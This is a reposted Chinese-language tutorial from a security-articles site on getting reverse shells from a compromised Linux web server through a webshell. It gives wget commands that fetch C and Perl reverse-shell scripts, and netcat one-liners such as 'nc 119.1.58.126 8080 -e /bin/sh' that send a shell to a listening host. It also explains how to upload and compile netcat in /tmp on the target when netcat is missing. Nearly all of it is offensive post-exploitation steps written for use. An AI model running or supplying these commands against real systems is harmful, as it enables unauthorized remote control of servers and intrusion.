当前位置:七道奇文章资讯系统安全Linux安全
日期:2011-07-16 22:53:00  来源:本站整理

linux下反弹shell脚本 C版和Perl版 webshell反弹回号令行[Linux安全]

赞助商链接



  本文“linux下反弹shell脚本 C版和Perl版 webshell反弹回号令行[Linux安全]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

 在线下载 可以用

wget http://www.linuxso.com/linuxexp/shell.c
wget http://www.linuxso.com/linuxexp/shell.pl
 
C语言版 用法阐明:
在外网linux上监听 nc -l -p 端口
gcc -o shell shell.c
./shell ip 端口
 
perl版 用法;
在外网linux上监听 nc -l -p 端口
perl shell.pl ip 端口
 
假如没有装NC 可以在线下载
wget http://www.linuxso.com/linuxexp/nc.tar.gz
解压 编译 安装 便可
tar -zxvf nc.tar.gz
cd netcat-0.7.1
configure //也可以用prefix指定个途径
make
make install
 
然后便可以监听了 号令 nc -l -p port
 
利用NC反弹Shell
 
在举行Shell反弹时,有时会碰到服务器不支持PHP大概WebShell无法成功反弹Shell的情形,比方有的服务器只支持JSP,不支持PHP.此时,可以一样采取Windows下的经典的NC反弹Shell办法.
 
Windows下反弹CmdShell时,首先要在本机运行“nc -vv -l -p 端口号”监听端口,然后在WebShell中履行“nc -e cmd.exe 监听主机IP地址  端口”,便可以反弹一个CmdShell.这个办法在Linux中仍旧可行,只不过需求作一点小小的窜改.
 
——在本机监听端口后,在WebShell运行nc反弹时,需求发送的是“/bin/sh”,而不是cmd.exe,这样才够反弹发送一个Linux下的Shell号令行窗口给监听主机.比方履行以下号令:
 
nc ip 440 -e /bin/sh
 
便可反弹一个Shell到IP地址的监听主机的440端口.
 
远程主机无NC工具时的办理办法
 
在利用NC反弹Shell时,还会碰到远程主机上不能直接履行nc,大概没有安装nc工具.碰到这样的情形,可以给手工给远程主机安装一个 NC,对比便利的办法是,到http://netcat.sourceforge.net/download.php下载nc源码,然后在本地Linux 机械上编译成可执路程序后,再将编译文件上传到远程主机上.假如本地编译的程序在远程主机上无法利用,可以直接把源码传上去后,在目标机械上直接编译.
 
假如需求在目标机械上编译NC的话,需求注意一些问题,因为在得到Shell号令行窗口前,只能在WebShell里履行号令,普通每次只能履行一条,然后等候履行后的后果回显.
 
别的,在编译时需求注意程序履行途径的问题.由于Linux下权限设置非常严峻,即便攻击者得到了WebShell,也大概无法直接在WEB网页目录下写入文件,只能在/tmp之类的文件夹中上传写入NC源文件
 
比方WebShell在/var/www/目录,那么在WebShell中履行号令默许的当前途径都是/var/www/,假如netcat源 码包解压在了/tmp/netcat-0.7.1文件夹,在编译netcat举行make操作时,由于当前途径是/var/www/,而不是/tmp /netcat-0.7.1,所以在make操作时会出错.办理这个问题其实很简单,可以直接把切换途径和make操作两句号令写成一句,用分号离隔写就 可以了.
 
将netcat-0.7.1源文件上传到可写文件夹/tmp中后,在WebShell中编译nc的操作历程及号令以下:
 
cd /tmp;tar zxvf /tmp/netcat-0.7.1.tar.gz
 
履行该号令后,可以将netcat-0.7.1源文件解压到/tmp/netcat-0.7.1目录中(图407).然后再履行号令:
 
/tmp/netcat-0.7.1/configure
 
配置完毕后,再履行以下号令举行编译:
 
cd /tmp/netcat-0.7.1;make
 
由于利用了分号,可同时履行两条号令,将make跟在目录切换号令背面,在编译的时刻就不会报错了
 
编译成功今后,便可以输入号令反弹Shell了,比方这里nc途径是/tmp/netcat-0.7.1/nc,在本地履行“nc -vv -l -p 8080”号令监听8080号端口后,在WebShell中履行以下号令:
 
cd /tmp/netcat-0.7.1;nc 119.1.58.126 8080 -e /bin/sh
 
便可向主机反弹回一个Shell号令行窗口了.需求注意的是,反弹的Linux Shell是没有$提醒符的,履行一句返回一句.别的,这里反弹Shell时刻运行的是/bin/sh,也可以反弹运行/bin/bash,但/bin /sh的权限比/bin/bash要设置松一些,因此成功率更高一些.   以上是“linux下反弹shell脚本 C版和Perl版 webshell反弹回号令行[Linux安全]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • windows下的近似linux下的grep号令--findstr
  • linux下mysql链接被防火墙禁止的办理办法
  • Linux下mysql新建账号及权限设置办法
  • SUSE Linux下搭建Web服务器
  • Windows/Linux MySQL忘掉密码重置密码教程
  • Linux下Apache自动监测重启脚本(智能化程度较高)
  • linux备份 linux克隆 linux clone
  • <b>为什么 Linux不需求碎片整理</b>
  • CentOS6 yum搭建Linux+Nginx+PHP+MYSQL(LNMP)
  • Linux系统有效防备ARP攻击
  • Linux下 Memcache的安装和简单管理
  • 笔记本预装linux重装成windows系统
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        100%(3)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .